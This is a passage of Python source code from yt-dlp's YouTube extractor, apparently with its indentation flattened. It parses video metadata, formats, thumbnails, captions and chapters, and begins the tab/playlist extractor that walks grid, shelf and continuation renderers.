webpage_url = base_url + 'watch?v=' + video_id
webpage, master_ytcfg, player_responses, player_url = self._download_player_responses(url, smuggled_data, video_id, webpage_url)
playability_statuses = traverse_obj(
player_responses, (..., 'playabilityStatus'), expected_type=dict, default=[])
trailer_video_id = get_first(
playability_statuses,
('errorScreen', 'playerLegacyDesktopYpcTrailerRenderer', 'trailerVideoId'),
expected_type=str)
if trailer_video_id:
return self.url_result(
trailer_video_id, self.ie_key(), trailer_video_id)
search_meta = ((lambda x: self._html_search_meta(x, webpage, default=None))
if webpage else (lambda x: None))
video_details = traverse_obj(
player_responses, (..., 'videoDetails'), expected_type=dict, default=[])
microformats = traverse_obj(
player_responses, (..., 'microformat', 'playerMicroformatRenderer'),
expected_type=dict, default=[])
video_title = (
get_first(video_details, 'title')
or self._get_text(microformats, (..., 'title'))
or search_meta(['og:title', 'twitter:title', 'title']))
video_description = get_first(video_details, 'shortDescription')
multifeed_metadata_list = get_first(
player_responses,
('multicamera', 'playerLegacyMulticameraRenderer', 'metadataList'),
expected_type=str)
if multifeed_metadata_list and not smuggled_data.get('force_singlefeed'):
if self.get_param('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
else:
entries = []
feed_ids = []
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain comma as well (see
# https://github.com/ytdl-org/youtube-dl/issues/8536)
feed_data = compat_parse_qs(
compat_urllib_parse_unquote_plus(feed))
def feed_entry(name):
return try_get(
feed_data, lambda x: x[name][0], compat_str)
feed_id = feed_entry('id')
if not feed_id:
continue
feed_title = feed_entry('title')
title = video_title
if feed_title:
title += ' (%s)' % feed_title
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%swatch?v=%s' % (base_url, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': title,
})
feed_ids.append(feed_id)
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(
entries, video_id, video_title, video_description)
duration = int_or_none(
get_first(video_details, 'lengthSeconds')
or get_first(microformats, 'lengthSeconds')
or parse_duration(search_meta('duration'))) or None
live_broadcast_details, is_live, streaming_data, formats = self._list_formats(
video_id, microformats, video_details, player_responses, player_url, duration)
if not formats:
if not self.get_param('allow_unplayable_formats') and traverse_obj(streaming_data, (..., 'licenseInfos')):
self.report_drm(video_id)
pemr = get_first(
playability_statuses,
('errorScreen', 'playerErrorMessageRenderer'), expected_type=dict) or {}
reason = self._get_text(pemr, 'reason') or get_first(playability_statuses, 'reason')
subreason = clean_html(self._get_text(pemr, 'subreason') or '')
if subreason:
if subreason == 'The uploader has not made this video available in your country.':
countries = get_first(microformats, 'availableCountries')
if not countries:
regions_allowed = search_meta('regionsAllowed')
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(subreason, countries, metadata_available=True)
reason += f'. {subreason}'
if reason:
self.raise_no_formats(reason, expected=True)
keywords = get_first(video_details, 'keywords', expected_type=list) or []
if not keywords and webpage:
keywords = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), webpage)]
for keyword in keywords:
if keyword.startswith('yt:stretch='):
mobj = re.search(r'(\d+)\s*:\s*(\d+)', keyword)
if mobj:
# NB: float is intentional for forcing float division
w, h = (float(v) for v in mobj.groups())
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
break
thumbnails = self._extract_thumbnails((video_details, microformats), (..., ..., 'thumbnail'))
thumbnail_url = search_meta(['og:image', 'twitter:image'])
if thumbnail_url:
thumbnails.append({
'url': thumbnail_url,
})
original_thumbnails = thumbnails.copy()
# The best resolution thumbnails sometimes does not appear in the webpage
# See: https://github.com/ytdl-org/youtube-dl/issues/29049, https://github.com/yt-dlp/yt-dlp/issues/340
# List of possible thumbnails - Ref: <https://stackoverflow.com/a/20542029>
thumbnail_names = [
'maxresdefault', 'hq720', 'sddefault', 'sd1', 'sd2', 'sd3',
'hqdefault', 'hq1', 'hq2', 'hq3', '0',
'mqdefault', 'mq1', 'mq2', 'mq3',
'default', '1', '2', '3'
]
n_thumbnail_names = len(thumbnail_names)
thumbnails.extend({
'url': 'https://i.ytimg.com/vi{webp}/{video_id}/{name}{live}.{ext}'.format(
video_id=video_id, name=name, ext=ext,
webp='_webp' if ext == 'webp' else '', live='_live' if is_live else ''),
} for name in thumbnail_names for ext in ('webp', 'jpg'))
for thumb in thumbnails:
i = next((i for i, t in enumerate(thumbnail_names) if f'/{video_id}/{t}' in thumb['url']), n_thumbnail_names)
thumb['preference'] = (0 if '.webp' in thumb['url'] else -1) - (2 * i)
self._remove_duplicate_formats(thumbnails)
self._downloader._sort_thumbnails(original_thumbnails)
category = get_first(microformats, 'category') or search_meta('genre')
channel_id = str_or_none(
get_first(video_details, 'channelId')
or get_first(microformats, 'externalChannelId')
or search_meta('channelId'))
owner_profile_url = get_first(microformats, 'ownerProfileUrl')
live_content = get_first(video_details, 'isLiveContent')
is_upcoming = get_first(video_details, 'isUpcoming')
if is_live is None:
if is_upcoming or live_content is False:
is_live = False
if is_upcoming is None and (live_content or is_live):
is_upcoming = False
live_start_time = parse_iso8601(get_first(live_broadcast_details, 'startTimestamp'))
live_end_time = parse_iso8601(get_first(live_broadcast_details, 'endTimestamp'))
if not duration and live_end_time and live_start_time:
duration = live_end_time - live_start_time
if is_live and self.get_param('live_from_start'):
self._prepare_live_from_start_formats(formats, video_id, live_start_time, url, webpage_url, smuggled_data)
formats.extend(self._extract_storyboard(player_responses, duration))
# Source is given priority since formats that throttle are given lower source_preference
# When throttling issue is fully fixed, remove this
self._sort_formats(formats, ('quality', 'res', 'fps', 'hdr:12', 'source', 'codec:vp9.2', 'lang', 'proto'))
info = {
'id': video_id,
'title': video_title,
'formats': formats,
'thumbnails': thumbnails,
# The best thumbnail that we are sure exists. Prevents unnecessary
# URL checking if user don't care about getting the best possible thumbnail
'thumbnail': traverse_obj(original_thumbnails, (-1, 'url')),
'description': video_description,
'uploader': get_first(video_details, 'author'),
'uploader_id': self._search_regex(r'/(?:channel|user)/([^/?&#]+)', owner_profile_url, 'uploader id') if owner_profile_url else None,
'uploader_url': owner_profile_url,
'channel_id': channel_id,
'channel_url': format_field(channel_id, template='https://www.youtube.com/channel/%s'),
'duration': duration,
'view_count': int_or_none(
get_first((video_details, microformats), (..., 'viewCount'))
or search_meta('interactionCount')),
'average_rating': float_or_none(get_first(video_details, 'averageRating')),
'age_limit': 18 if (
get_first(microformats, 'isFamilySafe') is False
or search_meta('isFamilyFriendly') == 'false'
or search_meta('og:restrictions:age') == '18+') else 0,
'webpage_url': webpage_url,
'categories': [category] if category else None,
'tags': keywords,
'playable_in_embed': get_first(playability_statuses, 'playableInEmbed'),
'is_live': is_live,
'was_live': (False if is_live or is_upcoming or live_content is False
else None if is_live is None or is_upcoming is None
else live_content),
'live_status': 'is_upcoming' if is_upcoming else None, # rest will be set by YoutubeDL
'release_timestamp': live_start_time,
}
pctr = traverse_obj(player_responses, (..., 'captions', 'playerCaptionsTracklistRenderer'), expected_type=dict)
if pctr:
def get_lang_code(track):
return (remove_start(track.get('vssId') or '', '.').replace('.', '-')
or track.get('languageCode'))
# Converted into dicts to remove duplicates
captions = {
get_lang_code(sub): sub
for sub in traverse_obj(pctr, (..., 'captionTracks', ...), default=[])}
translation_languages = {
lang.get('languageCode'): self._get_text(lang.get('languageName'), max_runs=1)
for lang in traverse_obj(pctr, (..., 'translationLanguages', ...), default=[])}
def process_language(container, base_url, lang_code, sub_name, query):
lang_subs = container.setdefault(lang_code, [])
for fmt in self._SUBTITLE_FORMATS:
query.update({
'fmt': fmt,
})
lang_subs.append({
'ext': fmt,
'url': urljoin('https://www.youtube.com', update_url_query(base_url, query)),
'name': sub_name,
})
subtitles, automatic_captions = {}, {}
for lang_code, caption_track in captions.items():
base_url = caption_track.get('baseUrl')
orig_lang = parse_qs(base_url).get('lang', [None])[-1]
if not base_url:
continue
lang_name = self._get_text(caption_track, 'name', max_runs=1)
if caption_track.get('kind') != 'asr':
if not lang_code:
continue
process_language(
subtitles, base_url, lang_code, lang_name, {})
if not caption_track.get('isTranslatable'):
continue
for trans_code, trans_name in translation_languages.items():
if not trans_code:
continue
orig_trans_code = trans_code
if caption_track.get('kind') != 'asr':
if 'translated_subs' in self._configuration_arg('skip'):
continue
trans_code += f'-{lang_code}'
trans_name += format_field(lang_name, template=' from %s')
# Add an "-orig" label to the original language so that it can be distinguished.
# The subs are returned without "-orig" as well for compatibility
if lang_code == f'a-{orig_trans_code}':
process_language(
automatic_captions, base_url, f'{trans_code}-orig', f'{trans_name} (Original)', {})
# Setting tlang=lang returns damaged subtitles.
process_language(automatic_captions, base_url, trans_code, trans_name,
{} if orig_lang == orig_trans_code else {'tlang': trans_code})
info['automatic_captions'] = automatic_captions
info['subtitles'] = subtitles
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
for k, v in query.items():
for d_k, s_ks in [('start', ('start', 't')), ('end', ('end',))]:
d_k += '_time'
if d_k not in info and k in s_ks:
info[d_k] = parse_duration(query[k][0])
# Youtube Music Auto-generated description
if video_description:
mobj = re.search(r'(?s)(?P<track>[^·\n]+)·(?P<artist>[^\n]+)\n+(?P<album>[^\n]+)(?:.+?℗\s*(?P<release_year>\d{4})(?!\d))?(?:.+?Released on\s*:\s*(?P<release_date>\d{4}-\d{2}-\d{2}))?(.+?\nArtist\s*:\s*(?P<clean_artist>[^\n]+))?.+\nAuto-generated by YouTube\.\s*$', video_description)
if mobj:
release_year = mobj.group('release_year')
release_date = mobj.group('release_date')
if release_date:
release_date = release_date.replace('-', '')
if not release_year:
release_year = release_date[:4]
info.update({
'album': mobj.group('album'.strip()),
'artist': mobj.group('clean_artist') or ', '.join(a.strip() for a in mobj.group('artist').split('·')),
'track': mobj.group('track').strip(),
'release_date': release_date,
'release_year': int_or_none(release_year),
})
initial_data = None
if webpage:
initial_data = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_DATA_RE, video_id,
'yt initial data')
if not initial_data:
query = {'videoId': video_id}
query.update(self._get_checkok_params())
initial_data = self._extract_response(
item_id=video_id, ep='next', fatal=False,
ytcfg=master_ytcfg, query=query,
headers=self.generate_api_headers(ytcfg=master_ytcfg),
note='Downloading initial data API JSON')
try:
# This will error if there is no livechat
initial_data['contents']['twoColumnWatchNextResults']['conversationBar']['liveChatRenderer']['continuations'][0]['reloadContinuationData']['continuation']
info.setdefault('subtitles', {})['live_chat'] = [{
'url': 'https://www.youtube.com/watch?v=%s' % video_id, # url is needed to set cookies
'video_id': video_id,
'ext': 'json',
'protocol': 'youtube_live_chat' if is_live or is_upcoming else 'youtube_live_chat_replay',
}]
except (KeyError, IndexError, TypeError):
pass
if initial_data:
info['chapters'] = (
self._extract_chapters_from_json(initial_data, duration)
or self._extract_chapters_from_engagement_panel(initial_data, duration)
or None)
contents = traverse_obj(
initial_data, ('contents', 'twoColumnWatchNextResults', 'results', 'results', 'contents'),
expected_type=list, default=[])
vpir = get_first(contents, 'videoPrimaryInfoRenderer')
if vpir:
stl = vpir.get('superTitleLink')
if stl:
stl = self._get_text(stl)
if try_get(
vpir,
lambda x: x['superTitleIcon']['iconType']) == 'LOCATION_PIN':
info['location'] = stl
else:
mobj = re.search(r'(.+?)\s*S(\d+)\s*•\s*E(\d+)', stl)
if mobj:
info.update({
'series': mobj.group(1),
'season_number': int(mobj.group(2)),
'episode_number': int(mobj.group(3)),
})
for tlb in (try_get(
vpir,
lambda x: x['videoActions']['menuRenderer']['topLevelButtons'],
list) or []):
tbr = tlb.get('toggleButtonRenderer') or {}
for getter, regex in [(
lambda x: x['defaultText']['accessibility']['accessibilityData'],
r'(?P<count>[\d,]+)\s*(?P<type>(?:dis)?like)'), ([
lambda x: x['accessibility'],
lambda x: x['accessibilityData']['accessibilityData'],
], r'(?P<type>(?:dis)?like) this video along with (?P<count>[\d,]+) other people')]:
label = (try_get(tbr, getter, dict) or {}).get('label')
if label:
mobj = re.match(regex, label)
if mobj:
info[mobj.group('type') + '_count'] = str_to_int(mobj.group('count'))
break
sbr_tooltip = try_get(
vpir, lambda x: x['sentimentBar']['sentimentBarRenderer']['tooltip'])
if sbr_tooltip:
like_count, dislike_count = sbr_tooltip.split(' / ')
info.update({
'like_count': str_to_int(like_count),
'dislike_count': str_to_int(dislike_count),
})
vsir = get_first(contents, 'videoSecondaryInfoRenderer')
if vsir:
vor = traverse_obj(vsir, ('owner', 'videoOwnerRenderer'))
info.update({
'channel': self._get_text(vor, 'title'),
'channel_follower_count': self._get_count(vor, 'subscriberCountText')})
rows = try_get(
vsir,
lambda x: x['metadataRowContainer']['metadataRowContainerRenderer']['rows'],
list) or []
multiple_songs = False
for row in rows:
if try_get(row, lambda x: x['metadataRowRenderer']['hasDividerLine']) is True:
multiple_songs = True
break
for row in rows:
mrr = row.get('metadataRowRenderer') or {}
mrr_title = mrr.get('title')
if not mrr_title:
continue
mrr_title = self._get_text(mrr, 'title')
mrr_contents_text = self._get_text(mrr, ('contents', 0))
if mrr_title == 'License':
info['license'] = mrr_contents_text
elif not multiple_songs:
if mrr_title == 'Album':
info['album'] = mrr_contents_text
elif mrr_title == 'Artist':
info['artist'] = mrr_contents_text
elif mrr_title == 'Song':
info['track'] = mrr_contents_text
fallbacks = {
'channel': 'uploader',
'channel_id': 'uploader_id',
'channel_url': 'uploader_url',
}
# The upload date for scheduled, live and past live streams / premieres in microformats
# may be different from the stream date. Although not in UTC, we will prefer it in this case.
# See: https://github.com/yt-dlp/yt-dlp/pull/2223#issuecomment-1008485139
upload_date = (
unified_strdate(get_first(microformats, 'uploadDate'))
or unified_strdate(search_meta('uploadDate')))
if not upload_date or (not info.get('is_live') and not info.get('was_live') and info.get('live_status') != 'is_upcoming'):
upload_date = strftime_or_none(self._extract_time_text(vpir, 'dateText')[0], '%Y%m%d')
info['upload_date'] = upload_date
for to, frm in fallbacks.items():
if not info.get(to):
info[to] = info.get(frm)
for s_k, d_k in [('artist', 'creator'), ('track', 'alt_title')]:
v = info.get(s_k)
if v:
info[d_k] = v
is_private = get_first(video_details, 'isPrivate', expected_type=bool)
is_unlisted = get_first(microformats, 'isUnlisted', expected_type=bool)
is_membersonly = None
is_premium = None
if initial_data and is_private is not None:
is_membersonly = False
is_premium = False
contents = try_get(initial_data, lambda x: x['contents']['twoColumnWatchNextResults']['results']['results']['contents'], list) or []
badge_labels = set()
for content in contents:
if not isinstance(content, dict):
continue
badge_labels.update(self._extract_badges(content.get('videoPrimaryInfoRenderer')))
for badge_label in badge_labels:
if badge_label.lower() == 'members only':
is_membersonly = True
elif badge_label.lower() == 'premium':
is_premium = True
elif badge_label.lower() == 'unlisted':
is_unlisted = True
info['availability'] = self._availability(
is_private=is_private,
needs_premium=is_premium,
needs_subscription=is_membersonly,
needs_auth=info['age_limit'] >= 18,
is_unlisted=None if is_private is None else is_unlisted)
info['__post_extractor'] = self.extract_comments(master_ytcfg, video_id, contents, webpage)
self.mark_watched(video_id, player_responses)
return info
class YoutubeTabBaseInfoExtractor(YoutubeBaseInfoExtractor):
@staticmethod
def passthrough_smuggled_data(func):
def _smuggle(entries, smuggled_data):
for entry in entries:
# TODO: Convert URL to music.youtube instead.
# Do we need to passthrough any other smuggled_data?
entry['url'] = smuggle_url(entry['url'], smuggled_data)
yield entry
@functools.wraps(func)
def wrapper(self, url):
url, smuggled_data = unsmuggle_url(url, {})
if self.is_music_url(url):
smuggled_data['is_music_url'] = True
info_dict = func(self, url, smuggled_data)
if smuggled_data and info_dict.get('entries'):
info_dict['entries'] = _smuggle(info_dict['entries'], smuggled_data)
return info_dict
return wrapper
def _extract_channel_id(self, webpage):
channel_id = self._html_search_meta(
'channelId', webpage, 'channel id', default=None)
if channel_id:
return channel_id
channel_url = self._html_search_meta(
('og:url', 'al:ios:url', 'al:android:url', 'al:web:url',
'twitter:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad',
'twitter:app:url:googleplay'), webpage, 'channel url')
return self._search_regex(
r'https?://(?:www\.)?youtube\.com/channel/([^/?#&])+',
channel_url, 'channel id')
@staticmethod
def _extract_basic_item_renderer(item):
# Modified from _extract_grid_item_renderer
known_basic_renderers = (
'playlistRenderer', 'videoRenderer', 'channelRenderer', 'showRenderer', 'reelItemRenderer'
)
for key, renderer in item.items():
if not isinstance(renderer, dict):
continue
elif key in known_basic_renderers:
return renderer
elif key.startswith('grid') and key.endswith('Renderer'):
return renderer
def _grid_entries(self, grid_renderer):
for item in grid_renderer['items']:
if not isinstance(item, dict):
continue
renderer = self._extract_basic_item_renderer(item)
if not isinstance(renderer, dict):
continue
title = self._get_text(renderer, 'title')
# playlist
playlist_id = renderer.get('playlistId')
if playlist_id:
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id,
ie=YoutubeTabIE.ie_key(), video_id=playlist_id,
video_title=title)
continue
# video
video_id = renderer.get('videoId')
if video_id:
yield self._extract_video(renderer)
continue
# channel
channel_id = renderer.get('channelId')
if channel_id:
yield self.url_result(
'https://www.youtube.com/channel/%s' % channel_id,
ie=YoutubeTabIE.ie_key(), video_title=title)
continue
# generic endpoint URL support
ep_url = urljoin('https://www.youtube.com/', try_get(
renderer, lambda x: x['navigationEndpoint']['commandMetadata']['webCommandMetadata']['url'],
compat_str))
if ep_url:
for ie in (YoutubeTabIE, YoutubePlaylistIE, YoutubeIE):
if ie.suitable(ep_url):
yield self.url_result(
ep_url, ie=ie.ie_key(), video_id=ie._match_id(ep_url), video_title=title)
break
def _music_reponsive_list_entry(self, renderer):
video_id = traverse_obj(renderer, ('playlistItemData', 'videoId'))
if video_id:
return self.url_result(f'https://music.youtube.com/watch?v={video_id}',
ie=YoutubeIE.ie_key(), video_id=video_id)
playlist_id = traverse_obj(renderer, ('navigationEndpoint', 'watchEndpoint', 'playlistId'))
if playlist_id:
video_id = traverse_obj(renderer, ('navigationEndpoint', 'watchEndpoint', 'videoId'))
if video_id:
return self.url_result(f'https://music.youtube.com/watch?v={video_id}&list={playlist_id}',
ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
return self.url_result(f'https://music.youtube.com/playlist?list={playlist_id}',
ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
browse_id = traverse_obj(renderer, ('navigationEndpoint', 'browseEndpoint', 'browseId'))
if browse_id:
return self.url_result(f'https://music.youtube.com/browse/{browse_id}',
ie=YoutubeTabIE.ie_key(), video_id=browse_id)
def _shelf_entries_from_content(self, shelf_renderer):
content = shelf_renderer.get('content')
if not isinstance(content, dict):
return
renderer = content.get('gridRenderer') or content.get('expandedShelfContentsRenderer')
if renderer:
# TODO: add support for nested playlists so each shelf is processed
# as separate playlist
# TODO: this includes only first N items
for entry in self._grid_entries(renderer):
yield entry
renderer = content.get('horizontalListRenderer')
if renderer:
# TODO
pass
def _shelf_entries(self, shelf_renderer, skip_channels=False):
ep = try_get(
shelf_renderer, lambda x: x['endpoint']['commandMetadata']['webCommandMetadata']['url'],
compat_str)
shelf_url = urljoin('https://www.youtube.com', ep)
if shelf_url:
# Skipping links to another channels, note that checking for
# endpoint.commandMetadata.webCommandMetadata.webPageTypwebPageType == WEB_PAGE_TYPE_CHANNEL
# will not work
if skip_channels and '/channels?' in shelf_url:
return
title = self._get_text(shelf_renderer, 'title')
yield self.url_result(shelf_url, video_title=title)
# Shelf may not contain shelf URL, fallback to extraction from content
for entry in self._shelf_entries_from_content(shelf_renderer):
yield entry
def _playlist_entries(self, video_list_renderer):
for content in video_list_renderer['contents']:
if not isinstance(content, dict):
continue
renderer = content.get('playlistVideoRenderer') or content.get('playlistPanelVideoRenderer')
if not isinstance(renderer, dict):
continue
video_id = renderer.get('videoId')
if not video_id:
continue
yield self._extract_video(renderer)
def _rich_entries(self, rich_grid_renderer):
renderer = try_get(
rich_grid_renderer, lambda x: x['content']['videoRenderer'], dict) or {}
video_id = renderer.get('videoId')
if not video_id:
return
yield self._extract_video(renderer)
def _video_entry(self, video_renderer):
video_id = video_renderer.get('videoId')
if video_id:
return self._extract_video(video_renderer)
def _hashtag_tile_entry(self, hashtag_tile_renderer):
url = urljoin('https://youtube.com', traverse_obj(
hashtag_tile_renderer, ('onTapCommand', 'commandMetadata', 'webCommandMetadata', 'url')))
if url:
return self.url_result(
url, ie=YoutubeTabIE.ie_key(), title=self._get_text(hashtag_tile_renderer, 'hashtag'))
def _post_thread_entries(self, post_thread_renderer):
post_renderer = try_get(
post_thread_renderer, lambda x: x['post']['backstagePostRenderer'], dict)
if not post_renderer:
return
# video attachment
video_renderer = try_get(
post_renderer, lambda x: x['backstageAttachment']['videoRenderer'], dict) or {}
video_id = video_renderer.get('videoId')
if video_id:
entry = self._extract_video(video_renderer)
if entry:
yield entry
# playlist attachment
playlist_id = try_get(
post_renderer, lambda x: x['backstageAttachment']['playlistRenderer']['playlistId'], compat_str)
if playlist_id:
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id,
ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
# inline video links
runs = try_get(post_renderer, lambda x: x['contentText']['runs'], list) or []
for run in runs:
if not isinstance(run, dict):
continue
ep_url = try_get(
run, lambda x: x['navigationEndpoint']['urlEndpoint']['url'], compat_str)
if not ep_url:
continue
if not YoutubeIE.suitable(ep_url):
continue
ep_video_id = YoutubeIE._match_id(ep_url)
if video_id == ep_video_id:
continue
yield self.url_result(ep_url, ie=YoutubeIE.ie_key(), video_id=ep_video_id)
def _post_thread_continuation_entries(self, post_thread_continuation):
contents = post_thread_continuation.get('contents')
if not isinstance(contents, list):
return
for content in contents:
renderer = content.get('backstagePostThreadRenderer')
if not isinstance(renderer, dict):
continue
for entry in self._post_thread_entries(renderer):
yield entry
r''' # unused
def _rich_grid_entries(self, contents):
for content in contents:
video_renderer = try_get(content, lambda x: x['richItemRenderer']['content']['videoRenderer'], dict)
if video_renderer:
entry = self._video_entry(video_renderer)
if entry:
yield entry
'''
def _extract_entries(self, parent_renderer, continuation_list):
# continuation_list is modified in-place with continuation_list = [continuation_token]
continuation_list[:] = [None]
contents = try_get(parent_renderer, lambda x: x['contents'], list) or []
for content in contents:
if not isinstance(content, dict):
continue
is_renderer = traverse_obj(
content, 'itemSectionRenderer', 'musicShelfRenderer', 'musicShelfContinuation',
expected_type=dict)
if not is_renderer:
renderer = content.get('richItemRenderer')
if renderer:
for entry in self._rich_entries(renderer):
yield entry
continuation_list[0] = self._extract_continuation(parent_renderer)
continue
isr_contents = try_get(is_renderer, lambda x: x['contents'], list) or []
for isr_content in isr_contents:
if not isinstance(isr_content, dict):
continue
known_renderers = {
'playlistVideoListRenderer': self._playlist_entries,
'gridRenderer': self._grid_entries,
'reelShelfRenderer': self._grid_entries,
'shelfRenderer': self._shelf_entries,
'musicResponsiveListItemRenderer': lambda x: [self._music_reponsive_list_entry(x)],
'backstagePostThreadRenderer': self._post_thread_entries,
'videoRenderer': lambda x: [self._video_entry(x)],
'playlistRenderer': lambda x: self._grid_entries({'items': [{'playlistRenderer': x}]}),
'channelRenderer': lambda x: self._grid_entries({'items': [{'channelRenderer': x}]}),
'hashtagTileRenderer': lambda x: [self._hashtag_tile_entry(x)]
}
for key, renderer in isr_content.items():
if key not in known_renderers:
continue
for entry in known_renderers[key](renderer):
if entry:
yield entry
continuation_list[0] = self._extract_continuation(renderer)
break
if not continuation_list[0]:
continuation_list[0] = self._extract_continuation(is_renderer)
if not continuation_list[0]:
continuation_list[0] = self._extract_continuation(parent_renderer)
def _entries(self, tab, item_id, ytcfg, account_syncid, visitor_data):
continuation_list = [None]
extract_entries = lambda x: self._extract_entries(x, continuation_list)
tab_content = try_get(tab, lambda x: x['content'], dict)
if not tab_content:
return
parent_renderer = (
try_get(tab_content, lambda x: x['sectionListRenderer'], dict)
or try_get(tab_content, lambda x: x['richGridRenderer'], dict) or {})
for entry in extract_entries(parent_renderer):
yield entry
continuation = continuation_list[0]
for page_num in itertools.count(1):
if not continuation:
break
headers = self.generate_api_headers(
ytcfg=ytcfg, account_syncid=account_syncid, visitor_data=visitor_data)
response = self._extract_response(
item_id='%s page %s' % (item_id, page_num),
query=continuation, headers=headers, ytcfg=ytcfg,
check_get_keys=('continuationContents', 'onResponseReceivedActions', 'onResponseReceivedEndpoints'))
if not response:
break
# Extracting updated visitor data is required to prevent an infinite extraction loop in some cases
# See: https://github.com/ytdl-org/youtube-dl/issues/28702
visitor_data = self._extract_visitor_data(response) or visitor_data
known_continuation_renderers = {
'playlistVideoListContinuation': self._playlist_entries,
'gridContinuation': self._grid_entries,
'itemSectionContinuation': self._post_thread_continuation_entries,
'sectionListContinuation': extract_entries, # for feeds
}
continuation_contents = try_get(
response, lambda x: x['continuationContents'], dict) or {}
continuation_renderer = None
for key, value in continuation_contents.items():
if key not in known_continuation_renderers:
continue
continuation_renderer = value
continuation_list = [None]
for entry in known_continuation_renderers[key](continuation_renderer):
yield entry
continuation = continuation_list[0] or self._extract_continuation(continuation_renderer)
break
if continuation_renderer:
continue
known_renderers = {
'videoRenderer': (self._grid_entries, 'items'), # for membership tab
'gridPlaylistRenderer': (self._grid_entries, 'items'),
'gridVideoRenderer': (self._grid_entries, 'items'),
'gridChannelRenderer': (self._grid_entries, 'items'),
'playlistVideoRenderer': (self._playlist_entries, 'contents'),
'itemSectionRenderer': (extract_entries, 'contents'), # for feeds
'richItemRenderer': (extract_entries, 'contents'), # for hashtag
'backstagePostThreadRenderer': (self._post_thread_continuation_entries, 'contents')
}
on_response_received = dict_get(response, ('onResponseReceivedActions', 'onResponseReceivedEndpoints'))
continuation_items = try_get(
on_response_received, lambda x: x[0]['appendContinuationItemsAction']['continuationItems'], list)
continuation_item = try_get(continuation_items, lambda x: x[0], dict) or {}
video_items_renderer = None
for key, value in continuation_item.items():
if key not in known_renderers:
continue
video_items_renderer = {known_renderers[key][1]: continuation_items}
continuation_list = [None]
for entry in known_renderers[key][0](video_items_renderer):
yield entry
continuation = continuation_list[0] or self._extract_continuation(video_items_renderer)
break
if video_items_renderer:
continue
break
@staticmethod
def _extract_selected_tab(tabs, fatal=True):
for tab in tabs:
renderer = dict_get(tab, ('tabRenderer', 'expandableTabRenderer')) or {}
if renderer.get('selected') is True:
return renderer
else:
if fatal:
raise ExtractorError('Unable to find selected tab')
def _extract_uploader(self, data):
uploader = {}
renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarSecondaryInfoRenderer') or {}
owner = try_get(
renderer, lambda x: x['videoOwner']['videoOwnerRenderer']['title']['runs'][0], dict)
if owner:
owner_text = owner.get('text')
uploader['uploader'] = self._search_regex(
r'^by (.+) and \d+ others?$', owner_text, 'uploader', default=owner_text)
uploader['uploader_id'] = try_get(
owner, lambda x: x['navigationEndpoint']['browseEndpoint']['browseId'], compat_str)
uploader['uploader_url'] = urljoin(
'https://www.youtube.com/',
try_get(owner, lambda x: x['navigationEndpoint']['browseEndpoint']['canonicalBaseUrl'], compat_str))
return {k: v for k, v in uploader.items() if v is not None}
def _extract_from_tabs(self, item_id, ytcfg, data, tabs):
playlist_id = title = description = channel_url = channel_name = channel_id = None
tags = []
selected_tab = self._extract_selected_tab(tabs)
primary_sidebar_renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarPrimaryInfoRenderer')
renderer = try_get(
data, lambda x: x['metadata']['channelMetadataRenderer'], dict)
if renderer:
channel_name = renderer.get('title')
channel_url = renderer.get('channelUrl')
channel_id = renderer.get('externalId')
else:
renderer = try_get(
data, lambda x: x['metadata']['playlistMetadataRenderer'], dict)
if renderer:
title = renderer.get('title')
description = renderer.get('description', '')
playlist_id = channel_id
tags = renderer.get('keywords', '').split()
# We can get the uncropped banner/avatar by replacing the crop params with '=s0'
# See: https://github.com/yt-dlp/yt-dlp/issues/2237#issuecomment-1013694714
def _get_uncropped(url):
return url_or_none((url or '').split('=')[0] + '=s0')
avatar_thumbnails = self._extract_thumbnails(renderer, 'avatar')
if avatar_thumbnails:
uncropped_avatar = _get_uncropped(avatar_thumbnails[0]['url'])
if uncropped_avatar:
avatar_thumbnails.append({
'url': uncropped_avatar,
'id': 'avatar_uncropped',
'preference': 1
})
channel_banners = self._extract_thumbnails(
data, ('header', ..., ['banner', 'mobileBanner', 'tvBanner']))
for banner in channel_banners:
banner['preference'] = -10
if channel_banners:
uncropped_banner = _get_uncropped(channel_banners[0]['url'])
if uncropped_banner:
channel_banners.append({
'url': uncropped_banner,
'id': 'banner_uncropped',
'preference': -5
})
primary_thumbnails = self._extract_thumbnails(
primary_sidebar_renderer, ('thumbnailRenderer', ('playlistVideoThumbnailRenderer', 'playlistCustomThumbnailRenderer'), 'thumbnail'))
if playlist_id is None:
playlist_id = item_id
playlist_stats = traverse_obj(primary_sidebar_renderer, 'stats')
last_updated_unix, _ = self._extract_time_text(playlist_stats, 2)
if title is None:
title = self._get_text(data, ('header', 'hashtagHeaderRenderer', 'hashtag')) or playlist_id
title += format_field(selected_tab, 'title', ' - %s')
title += format_field(selected_tab, 'expandedText', ' - %s')
metadata = {
'playlist_id': playlist_id,
'playlist_title': title,
'playlist_description': description,
'uploader': channel_name,
'uploader_id': channel_id,
'uploader_url': channel_url,
'thumbnails': primary_thumbnails + avatar_thumbnails + channel_banners,
'tags': tags,
'view_count': self._get_count(playlist_stats, 1),
'availability': self._extract_availability(data),
'modified_date': strftime_or_none(last_updated_unix, '%Y%m%d'),
'playlist_count': self._get_count(playlist_stats, 0),
'channel_follower_count': self._get_count(data, ('header', ..., 'subscriberCountText')),
}
if not channel_id:
metadata.update(self._extract_uploader(data))
metadata.update({
'channel': metadata['uploader'],
'channel_id': metadata['uploader_id'],
